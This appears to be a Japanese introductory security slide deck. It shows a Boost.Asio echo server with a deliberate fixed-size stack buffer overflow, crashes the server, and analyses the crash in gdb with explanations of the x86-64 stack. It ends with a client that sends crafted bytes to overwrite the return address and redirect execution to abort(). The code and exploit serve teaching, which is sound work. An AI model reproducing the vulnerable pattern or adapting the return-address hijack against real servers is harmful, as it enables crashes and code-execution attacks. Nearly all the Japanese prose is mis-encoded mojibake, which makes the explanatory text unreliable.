セキュリティ入門

Transcript

1. ηΩϡϦςΟೖ໳ NAOMASA MATSUBAYASHI

2. ηΩϡϦςΟͷ໨ඪ

3. େࣄͳσʔλ αʔό ળྑͳϢʔβ ѱҙ͋ΔϢʔβ େࣄͳσʔλΛकΔ࠷΋؆୯Ͱ࣮֬ͳํ๏͸
   Ұ੾ͷΞΫηεΛड͚෇͚ͳ͍ࣄͰ͋Δ

4. େࣄͳσʔλ ળྑͳϢʔβ ѱҙ͋ΔϢʔβ αʔό ͔͠͠αʔό͸αʔϏεΛఏڙ͢ΔͨΊʹ
   ϢʔβͷཁٻΛड͚෇͚ͳ͚Ε͹ͳΒͳ͍

5. େࣄͳσʔλ ળྑͳϢʔβ ѱҙ͋ΔϢʔβ αʔό ҙਤͨ͠௨Γʹ࢖͏ϢʔβΛड͚෇͚ͳ͕Β
   ҙਤ͠ͳ͍࢖͍ํΛ͢ΔϢʔβΛڋ൱͢Δඞཁ͕͋Δ

6. ༏ΕͨηΩϡϦςΟͱ͸ ҙਤͨ͠࢖͍ํͱ
   ҙਤ͠ͳ͍࢖͍ํΛ
   ΑΓਖ਼֬ʹࣝผ͢Δ͜ͱ͕Ͱ͖Δࣄ

7. ҙਤ͠ͳ͍࢖͍ํͱ͸

8. #include <memory> #include <boost/asio.hpp> #include <boost/bind.hpp> namespace asio = boost::asio;

   using boost::asio::ip::tcp; using sock_p = std::shared_ptr< tcp::socket >; using buf_p = std::shared_ptr< asio::streambuf >; using error_type = boost::system::error_code; struct session : public std::enable_shared_from_this< session > { session( asio::io_service &io ) : sock( io ) {} void read() { boost::asio::async_read_until( sock, buf, '\n', boost::bind( &session::check_on_read, shared_from_this(), asio::placeholders::bytes_transferred, asio::placeholders::error ) ); } void write( const char *data, size_t len ) { boost::asio::async_write( sock, boost::asio::buffer( data, len ), boost::bind( &session::check_on_write, shared_from_this(), asio::placeholders::error ) ); } tcp::socket &get_socket() { return sock; } private: void check_on_read( size_t len, const error_type& e ) { if( e && e != boost::asio::error::eof ) return; on_read( len ); } void on_read( size_t len ) { char received[ 32 ]; std::memcpy( received, asio::buffer_cast<const char*>( buf.data() ), len ); buf.consume( len ); https://wandbox.org/permlink/eucMJp4DkeLhnGlq όάͷ͋ΔΤίʔαʔό

9. buf.consume( len ); received[ len ] = '\0'; write( received,

   len ); } void check_on_write( const error_type& e ) { if( e && e != boost::asio::error::eof ) return; on_write(); } void on_write() { read(); } tcp::socket sock; asio::streambuf buf; }; struct server { server( asio::io_service &io_ ) : io( io_ ), acc( io, tcp::endpoint( tcp::v4(), 20000 ) ) { accept(); } void accept() { std::shared_ptr< session > s( new session( io ) ); acc.async_accept( s->get_socket(), boost::bind( &server::on_accept, this, s, asio::placeholders::error ) ); } private: void on_accept( const std::shared_ptr< session > &s, const error_type& e ) { if( !e ) s->read(); accept(); } asio::io_service &io; boost::asio::ip::tcp::acceptor acc; }; int main() { asio::io_service io; server s( io ); io.run(); } https://wandbox.org/permlink/eucMJp4DkeLhnGlq όάͷ͋ΔΤίʔαʔό

10. } void on_read( size_t len ) { char received[ 32

    ]; std::memcpy( received, asio::buffer_cast<const char*>( buf.data() ), len ); buf.consume( len ); received[ len ] = '\0'; write( received, len ); } void check_on_write( const error_type& e ) { if( e && e != boost::asio::error::eof ) return; on_write(); } void on_write() { read(); } tcp::socket sock; asio::streambuf buf; }; struct server { server( asio::io_service &io_ ) : io( io_ ), acc( io, tcp::endpoint( tcp::v4(), 20000 ) ) { accept(); } void accept() { std::shared_ptr< session > s( new session( io ) ); acc.async_accept( s->get_socket(), boost::bind( &server::on_accept, this, s, asio::placeholders::error ) ); } private: void on_accept( const std::shared_ptr< session > &s, const error_type& e ) { if( !e ) s->read(); accept(); } asio::io_service &io; boost::asio::ip::tcp::acceptor acc; }; int main() { asio::io_service io; https://wandbox.org/permlink/eucMJp4DkeLhnGlq ݻఆ௕ ௨৴Ͱड͚औͬͨσʔλ͕
    ݻఆ௕ͷ഑ྻʹऩ·ΔαΠζͱ͸ݶΒͳ͍ ϦϞʔτ͔ΒόοϑΝΦʔόʔϥϯΛىͤ͜Δ όάͷ͋ΔΤίʔαʔό void on_read( size_t len ) { char received[ 32 ]; std::memcpy( received, asio::buffer_cast<const char*>( buf.data() ), len ); buf.consume( len ); received[ len ] = '\0'; write( received, len ); }

11. $ ./tiny_server $ telnet localhost 20000 Trying ::1... Trying 127.0.0.1...

    Connected to localhost. Escape character is '^]'. Hello, World! Hello, World! ૹ৴ͨ͠σʔλ όΠτ ΫϥΠΞϯτ αʔό ड৴ͨ͠σʔλ όΠτ receivedͷαΠζʹऩ·͍ͬͯΔ৔߹ɺҙਤͨ͠ಈ͖Λ͍ͯ͠Δ

12. $ telnet localhost 20000 Trying ::1... Trying 127.0.0.1... Connected to

    localhost. Escape character is '^]'. Hello, World! I would like to crash this server. Blah blah blah... Hello, World! I would like to crash this server. Blah blah blah... Connection closed by foreign host. ΫϥΠΞϯτ αʔό $ ./tiny_server Segmentation fault αʔό͕ࢮΜͩ

13. ߈ܸऀ͕αʔϏεΛར༻ෆೳʹͰ͖ΔࣄΛ Denial of Service߈ܸ
    ུͯ͠DoS߈ܸ͕Մೳͱݴ͏

14. ͱ͜ΖͰ͖ͬ͞ͷαʔό͸
    ԿނࢮΜͩ

15. $ gdb -q tiny_server Reading symbols from tiny_server...done. (gdb) disas

    session::on_read Dump of assembler code for function session::on_read(unsigned long): … 0x000000000040a6c3 <+69>: callq 0x403340 <memcpy@plt> 0x000000000040a6c8 <+74>: mov -0x38(%rbp),%rax … (gdb) b *0x40a6c3 Breakpoint 1 at 0x40a6c3: file tiny_server.cpp, line 38. (gdb) b *0x40a6c8 Breakpoint 2 at 0x40a6c8: file tiny_server.cpp, line 39. (gdb) run Starting program: /home/fadis/tiny_server [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib64/libthread_db.so.1". Breakpoint 1, 0x000000000040a6c3 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:38 38 std::memcpy( received, asio::buffer_cast<const char*>( buf.data() ), len ); (gdb) p &received $1 = (char (*)[32]) 0x7fffffffd2c0 (gdb) x/40wx 0x7fffffffd2c0 0x7fffffffd2c0: 0xffffd380 0x00007fff 0x0040fe53 0x00000000 0x7fffffffd2d0: 0x006331b0 0x00000000 0x00000044 0x00000000 σόοΨͰαʔό͕ࢮΜͩॠؒΛݟͯΈΑ͏ Ͳ͜ʹ໰୊͕͋Δ͔͸طʹΘ͔͍ͬͯΔͷͰ
    όοϑΝΦʔόʔϥϯΛҾ͖ى͜͢memcpyͷલޙͰ
    ϒϨʔΫϙΠϯτΛு͓ͬͯ͘

16. Starting program: /home/fadis/tiny_server [Thread debugging using libthread_db enabled] Using host

    libthread_db library "/lib64/libthread_db.so.1". Breakpoint 1, 0x000000000040a6c3 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:38 38 std::memcpy( received, asio::buffer_cast<const char*>( buf.data() ), len ); (gdb) p &received $1 = (char (*)[32]) 0x7fffffffd2c0 (gdb) x/40wx 0x7fffffffd2c0 0x7fffffffd2c0: 0xffffd380 0x00007fff 0x0040fe53 0x00000000 0x7fffffffd2d0: 0x006331b0 0x00000000 0x00000044 0x00000000 0x7fffffffd2e0: 0x006331b0 0x00000000 0x00000044 0x00000000 0x7fffffffd2f0: 0xffffd340 0x00007fff 0x0040a674 0x00000000 0x7fffffffd300: 0x00000043 0x00000000 0xffffd5d0 0x00007fff 0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000 0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000 0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000 0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000 0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff (gdb) c Continuing. Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39 39 buf.consume( len ); (gdb) x/40wx 0x7fffffffd2c0 0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021 0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f 0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576 ΫϥΠΞϯτ͔Βಧ͍ͨϝοηʔδΛ
    receivedʹॻ͖ࠐΉ௚લͷ
    received͔Β256όΠτͷϝϞϦͷঢ়ଶ receivedͷͨΊʹ֬อ͞Ε͍ͯΔ32όΠτ

17. 0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000 0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000

    0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000 0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff (gdb) c Continuing. Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39 39 buf.consume( len ); (gdb) x/40wx 0x7fffffffd2c0 0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021 0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f 0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576 0x7fffffffd2f0: 0x616c4220 0x6c622068 0x62206861 0x2e68616c 0x7fffffffd300: 0x0a0d2e2e 0x00000000 0xffffd5d0 0x00007fff 0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000 0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000 0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000 0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000 0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff (gdb) i r rsp rbp rsp 0x7fffffffd2b0 0x7fffffffd2b0 rbp 0x7fffffffd2f0 0x7fffffffd2f0 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42 42 } ΫϥΠΞϯτ͔Βಧ͍ͨϝοηʔδΛ
    receivedʹॻ͖ࠐΜͩ௚ޙͷ
    received͔Β256όΠτͷϝϞϦͷঢ়ଶ receivedͷͨΊʹ֬อ͞Ε͍ͯΔ32όΠτ

18. 0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000 0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000

    0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000 0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff (gdb) c Continuing. Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39 39 buf.consume( len ); (gdb) x/40wx 0x7fffffffd2c0 0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021 0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f 0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576 0x7fffffffd2f0: 0x616c4220 0x6c622068 0x62206861 0x2e68616c 0x7fffffffd300: 0x0a0d2e2e 0x00000000 0xffffd5d0 0x00007fff 0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000 0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000 0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000 0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000 0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff (gdb) i r rsp rbp rsp 0x7fffffffd2b0 0x7fffffffd2b0 rbp 0x7fffffffd2f0 0x7fffffffd2f0 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42 42 } ͜ͷҐஔʹվߦจࣈ͕ݟ͑ΔͨΊ
    ഑ྻͷऴ୺Λ௒͑ͯ
    ͜͜·Ͱॻ͖ࠐΈ͕ߦΘΕͨ͜ͱ͕Θ͔Δ receivedͷͨΊʹ֬อ͞Ε͍ͯΔ32όΠτ

19. (gdb) i r rsp rbp rsp 0x7fffffffd2b0 0x7fffffffd2b0 rbp 0x7fffffffd2f0

    0x7fffffffd2f0 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42 42 } (gdb) backtrace #0 0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42 #1 0x2e68616c62206861 in ?? () #2 0x000000000a0d2e2e in ?? () #3 0x00007fffffffd5d0 in ?? () #4 0x0000000000000044 in ?? () #5 0x0000000000632ef0 in ?? () #6 0x00007fffffffd340 in ?? () #7 0x0000000000412898 in boost::get_pointer<session> ( p=<error reading variable: Cannot access memory at address 0x6c622068616c4218>) at /usr/include/boost/get_pointer.hpp:69 Backtrace stopped: Cannot access memory at address 0x6c622068616c4228 (gdb) disas … => 0x000000000040a706 <+136>: retq End of assembler dump. (gdb) Կॲ ࣮ߦΛଓ͚Δͱon_read͔Βreturnͨ͠ॴͰࢮ͵ όοΫτϨʔεΛݟΔͱon_read͕ฦΖ͏ͱͨ͠
    ݺͼग़͠ݩͷؔ਺ͷΞυϨε͕͓͔͍͠

20. 0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff (gdb) c Continuing. Breakpoint 2,

    session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39 39 buf.consume( len ); (gdb) x/40wx 0x7fffffffd2c0 0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021 0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f 0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576 0x7fffffffd2f0: 0x616c4220 0x6c622068 0x62206861 0x2e68616c 0x7fffffffd300: 0x0a0d2e2e 0x00000000 0xffffd5d0 0x00007fff 0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000 0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000 0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000 0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000 0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff (gdb) i r rsp rbp rsp 0x7fffffffd2b0 0x7fffffffd2b0 rbp 0x7fffffffd2f0 0x7fffffffd2f0 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42 42 } (gdb) backtrace #0 0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42 #1 0x2e68616c62206861 in ?? () #2 0x000000000a0d2e2e in ?? () ͜ͷΞυϨε͸
    ͖ͬ͞ॻ͖ࠐΜͩϝοηʔδͷҰ෦ͩ

21. $16ͷߏ଄ CPU rax rbx rcx rdx rsi rdi rbp rsp

    r8 r9 r10 r11 r12 r13 r14 r15 ࠓ೔ͷIntelϓϩηοαʹ͸ ܭࢉʹ࢖͏஋ΛೖΕ͓ͯ͘ശ(Ϩδελ)͕ 16ݸඋΘ͍ͬͯΔ 16ݸͰ͸଍Γͳ͘ͳͬͨΒ ࠓ͙͍͢Βͳ͍஋ΛϝϞϦʹҠͯ͠ϨδελΛۭ͚Δ

22. ελοΫ CPU rax rbx rcx rdx rsi rdi rbp rsp

    r8 r9 r10 r11 r12 r13 r14 r15 Ϩδελ͔Βୀආͨ͠஋͕ੵ·Ε͍ͯ͘ ୀආͨ͠஋͕࠶ͼඞཁʹͳͬͨΒ ্͔ΒऔΓग़͍ͯ͘͠ rdi͔ΒҠͨ͠஋ rax͔ΒҠͨ͠஋ rbp͔ΒҠͨ͠஋ rdi͔ΒҠͨ͠஋ ͜ͷΑ͏ʹ࢖ΘΕΔϝϞϦྖҬΛ ελοΫͱݺͿ

23. ελοΫ int f( int x, int y ) { int

    i; i = x * y; return i; } ͜ͷiͷΑ͏ͳϩʔΧϧม਺͸
    ελοΫͷதʹஔ͔Ε͍ͯΔ ଞͷม਺౳ ଞͷม਺౳ ଞͷม਺౳ i ϩʔΧϧม਺͕࡞ΒΕΔͱελοΫʹ஋͕ੵ·Ε
    είʔϓΛൈ͚ΔͱελοΫͷ஋͕ഁغ͞ΕΔ

24. int f( int i, int j ) { return i

    + j; } int g() { return f( 2, 3 ); } ؔ਺ݺͼग़͠Λߦ͏ͱcallq໋ྩ͕ੜ੒͞ΕΔ
    return͢Δͱretq໋ྩ͕ੜ੒͞ΕΔ 00000000004004b6 <f>: 4004b6: 55 push %rbp 4004b7: 48 89 e5 mov %rsp,%rbp 4004ba: 89 7d fc mov %edi,-0x4(%rbp) 4004bd: 89 75 f8 mov %esi,-0x8(%rbp) 4004c0: 8b 55 fc mov -0x4(%rbp),%edx 4004c3: 8b 45 f8 mov -0x8(%rbp),%eax 4004c6: 01 d0 add %edx,%eax 4004c8: 5d pop %rbp 4004c9: c3 retq 00000000004004ca <g>: 4004ca: 55 push %rbp 4004cb: 48 89 e5 mov %rsp,%rbp 4004ce: be 03 00 00 00 mov $0x3,%esi 4004d3: bf 02 00 00 00 mov $0x2,%edi 4004d8: e8 d9 ff ff ff callq 4004b6 <f> 4004dd: 5d pop %rbp 4004de: c3 retq callq͸ελοΫʹ
    callqͷ࣍ͷΞυϨεΛੵΜͰ
    Ҿ਺Ͱࢦఆ͞ΕͨΞυϨεʹඈͿ retq͸ελοΫͷઌ಄ʹੵ·Εͨ
    ΞυϨεʹඈΜͰ
    ελοΫͷઌ಄ͷ஋ΛࣺͯΔ ͜ͷ૊Έ߹ΘͤͰ
    ؔ਺Λൈ͚ͨΒݩͷ৔ॴʹ໭Δ
    ͕࣮ݱ͞Ε͍ͯΔ

25. ؔ਺fͷม਺ ؔ਺fͷม਺ ؔ਺fͷม਺ ؔ਺g͕ऴΘͬͨΒ໭ΔҐஔ ؔ਺gͷม਺ ؔ਺gͷม਺ ؔ਺h͕ऴΘͬͨΒ໭ΔҐஔ ؔ਺hͷม਺ ؔ਺hͷม਺ ؔ਺hͷม਺

    ؔ਺f͕ؔ਺gΛݺΜͰ
    ͦͷதͰؔ਺h͕ݺ͹Ε͍ͯΔ࣌ͷελοΫ ࣮ߦதͷؔ਺ʹͱͬͯͷ
    ελοΫͷઌ಄ͱ຤ඌͷҐஔ͸$16ͷ
    %rspϨδελͱ%rbpϨδελʹ
    ه࿥͞Ε͍ͯΔ

26. ؔ਺fͷม਺ ؔ਺fͷม਺ ؔ਺fͷม਺ ؔ਺g͕ऴΘͬͨΒ໭ΔҐஔ ؔ਺gͷม਺ ؔ਺gͷม਺ ؔ਺h͕ऴΘͬͨΒ໭ΔҐஔ ؔ਺hͷม਺ ؔ਺hͷม਺ ؔ਺hͷม਺

    ؔ਺͸callq͞ΕͨΒ·ͣ
    ݱࡏͷ%rbpΛελοΫʹੵΜͰ
    %rbpΛ%rspʹ͢Δ
    ͭ·Γݺͼग़͠ݩͷؔ਺ͷελοΫͷઌ಄Λ
    ͜Ε͔Β࣮ߦ͢Δؔ਺ͷελοΫͷ຤ඌʹ͢Δ ؔ਺fͷSCQ ؔ਺gͷSCQ ؔ਺͔Βretq͢Δ௚લʹ
    %rbpΛελοΫͷઌ಄ͷ஋ʹͯ͠
    ελοΫͷઌ಄ͷ஋Λഁغ͢Δ

27. 00000000004004b6 <f>: 4004b6: 55 push %rbp 4004b7: 48 89 e5

    mov %rsp,%rbp 4004ba: 89 7d fc mov %edi,-0x4(%rbp) 4004bd: 89 75 f8 mov %esi,-0x8(%rbp) 4004c0: 8b 55 fc mov -0x4(%rbp),%edx 4004c3: 8b 45 f8 mov -0x8(%rbp),%eax 4004c6: 01 d0 add %edx,%eax 4004c8: 5d pop %rbp 4004c9: c3 retq 00000000004004ca <g>: 4004ca: 55 push %rbp 4004cb: 48 89 e5 mov %rsp,%rbp 4004ce: be 03 00 00 00 mov $0x3,%esi 4004d3: bf 02 00 00 00 mov $0x2,%edi 4004d8: e8 d9 ff ff ff callq 4004b6 <f> 4004dd: 5d pop %rbp 4004de: c3 retq SCQΛελοΫʹੵΉ SCQΛSTQͷ஋ʹ͢Δ SCQΛελοΫͷ஋ʹ͢Δ ελοΫʹॻ͔ΕͨΞυϨεʹ໭Δ ͜ͷล͕ؔ਺ͷॲཧͷຊମ

28. (gdb) run Starting program: /home/fadis/tiny_server [Thread debugging using libthread_db enabled]

    Using host libthread_db library "/lib64/libthread_db.so.1". Breakpoint 1, 0x000000000040a6c3 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:38 38 std::memcpy( received, asio::buffer_cast<const char*>( buf.data() ), len ); (gdb) p &received $1 = (char (*)[32]) 0x7fffffffd2c0 (gdb) x/40wx 0x7fffffffd2c0 0x7fffffffd2c0: 0xffffd380 0x00007fff 0x0040fe53 0x00000000 0x7fffffffd2d0: 0x006331b0 0x00000000 0x00000044 0x00000000 0x7fffffffd2e0: 0x006331b0 0x00000000 0x00000044 0x00000000 0x7fffffffd2f0: 0xffffd340 0x00007fff 0x0040a674 0x00000000 0x7fffffffd300: 0x00000043 0x00000000 0xffffd5d0 0x00007fff 0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000 0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000 0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000 0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000 0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff (gdb) c Continuing. Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39 39 buf.consume( len ); (gdb) x/40wx 0x7fffffffd2c0 0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021 0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f ͔͜͜Β্͕
    on_readͷελοΫ (gdb) i r rsp rbp rsp 0x7fffffffd2b0 0x7fffffffd2b0 rbp 0x7fffffffd2f0 0x7fffffffd2f0 on_readʹுͬͨϒϨʔΫϙΠϯτͰͷ
    %rbpͱ%rspͷ஋ on_readΛݺͼग़ͨؔ͠਺ͷ%rbp on_read͕returnͨ͠ࡍʹඈͿઌͷΞυϨε όοϑΝΦʔόʔϥϯલ

29. 0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000 0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000

    0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000 0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000 0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff (gdb) c Continuing. Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39 39 buf.consume( len ); (gdb) x/40wx 0x7fffffffd2c0 0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021 0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f 0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576 0x7fffffffd2f0: 0x616c4220 0x6c622068 0x62206861 0x2e68616c 0x7fffffffd300: 0x0a0d2e2e 0x00000000 0xffffd5d0 0x00007fff 0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000 0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000 0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000 0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000 0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff (gdb) i r rsp rbp rsp 0x7fffffffd2b0 0x7fffffffd2b0 rbp 0x7fffffffd2f0 0x7fffffffd2f0 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42 ͔͜͜Β্͕
    on_readͷελοΫ (gdb) i r rsp rbp rsp 0x7fffffffd2b0 0x7fffffffd2b0 rbp 0x7fffffffd2f0 0x7fffffffd2f0 on_readʹுͬͨϒϨʔΫϙΠϯτͰͷ
    %rbpͱ%rspͷ஋ on_readΛݺͼग़ͨؔ͠਺ͷ%rbp on_read͕returnͨ͠ࡍʹඈͿઌͷΞυϨε όοϑΝΦʔόʔϥϯޙ returnΞυϨε͕ॻ͖׵Θͬͯ͠·ͬͨ

30. #1 0x2e68616c62206861 in ?? () #2 0x000000000a0d2e2e in ?? ()

    returnΞυϨε͕ॻ͖׵Θͬͨঢ়ଶͰretqͨ݁͠Ռ ΞυϨε͕ࢦ͢ઌͷϝϞϦʹΞΫηεͰ͖ͳ͔ͬͨҝ ൣғ֎ࢀরͰϓϩηε͕ఀࢭͨ͠ όοϑΝΦʔόʔϥϯʹΑͬͯ
    ഑ྻreceivedͷઌʹஔ͍ͯ͋ͬͨ
    returnΞυϨε͕ॻ͖׵͑ΒΕͯ͠·ͬͨ

31. ॻ͖׵͑ΒΕͨΞυϨε͕
    ΞΫηεՄೳͩͬͨΒ
    Կ͕ى͍ͬͯͨ͜

32. #include <iostream> #include <boost/asio.hpp> int main() { namespace asio =

    boost::asio; using boost::asio::ip::tcp; asio::io_service io_service; tcp::socket socket(io_service); socket.connect( tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 ) ); std::vector< uint8_t > data { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe0, 0x24, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00, 0x0d, 0x0a, }; boost::system::error_code error; asio::write(socket, asio::buffer(data), error); return 0; if( !error ) { asio::streambuf receive_buffer; asio::read_until(socket, receive_buffer, '\n', error); std::cout << asio::buffer_cast<const char*>(receive_buffer.data()) << std::endl; } } ࡉ޻ͨ͠σʔλΛૹΔΫϥΠΞϯτ

33. #include <iostream> #include <boost/asio.hpp> int main() { namespace asio =

    boost::asio; using boost::asio::ip::tcp; asio::io_service io_service; tcp::socket socket(io_service); socket.connect( tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 ) ); std::vector< uint8_t > data { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe0, 0x24, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00, 0x0d, 0x0a, }; boost::system::error_code error; asio::write(socket, asio::buffer(data), error); return 0; if( !error ) { asio::streambuf receive_buffer; asio::read_until(socket, receive_buffer, '\n', error); std::cout << asio::buffer_cast<const char*>(receive_buffer.data()) << std::endl; } } (gdb) disas abort Dump of assembler code for function abort: 0x00007ffff6f624e0 <+0>: sub $0x128,%rsp 0x00007ffff6f624e7 <+7>: mov %fs:0x10,%rdx … Cݴޠඪ४ϥΠϒϥϦͷabortؔ਺ͷΞυϨε͕
    ελοΫͷreturnΞυϨεͷҐஔʹདྷΔΑ͏ʹ
    αʔόʹૹΔσʔλΛ࡞Δ

34. $ ./pktgen ΫϥΠΞϯτ αʔό $ gdb -q ./tiny_server Reading symbols

    from ./tiny_server...done. (gdb) run Starting program: /home/fadis/tiny_server [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib64/ libthread_db.so.1". Program received signal SIGABRT, Aborted. 0x00007ffff6f61228 in raise () from / lib64/libc.so.6 (gdb) backtrace #0 0x00007ffff6f61228 in raise () from / lib64/libc.so.6 #1 0x00007ffff6f6264a in abort () from / lib64/libc.so.6 #2 0x0000000000000a0d in ?? () #3 0x00007fffffffd5d0 in ?? () SIGSEGVͰ͸ͳ͘SIGABRTͰαʔό͕ఀࢭͨ͠

35. Program received signal SIGABRT, Aborted. 0x00007ffff6f61228 in raise () from

    / lib64/libc.so.6 (gdb) backtrace #0 0x00007ffff6f61228 in raise () from / lib64/libc.so.6 #1 0x00007ffff6f6264a in abort () from / lib64/libc.so.6 #2 0x0000000000000a0d in ?? () #3 0x00007fffffffd5d0 in ?? () #4 0x0000000000000042 in ?? () #5 0x0000000000632ef0 in ?? () #6 0x00007fffffffd340 in ?? () #7 0x0000000000412898 in boost::get_pointer<session> ( p=<error reading variable: Cannot access memory at address 0xfffffffffffffff9>) at /usr/include/boost/get_pointer.hpp: 69 Backtrace stopped: previous frame inner to this frame (corrupt stack?) αʔόͷίʔυ্Ͱ͸
    ݺΜͰ͍ͳ͍
    abortؔ਺͕
    ݺ͹Εͨ͜ͱʹͳ͍ͬͯΔ

36. ߈ܸऀ͕ࢦఆͨؔ͠਺͕
    ࣮ߦ͞Εͯ͠·ͬͨ

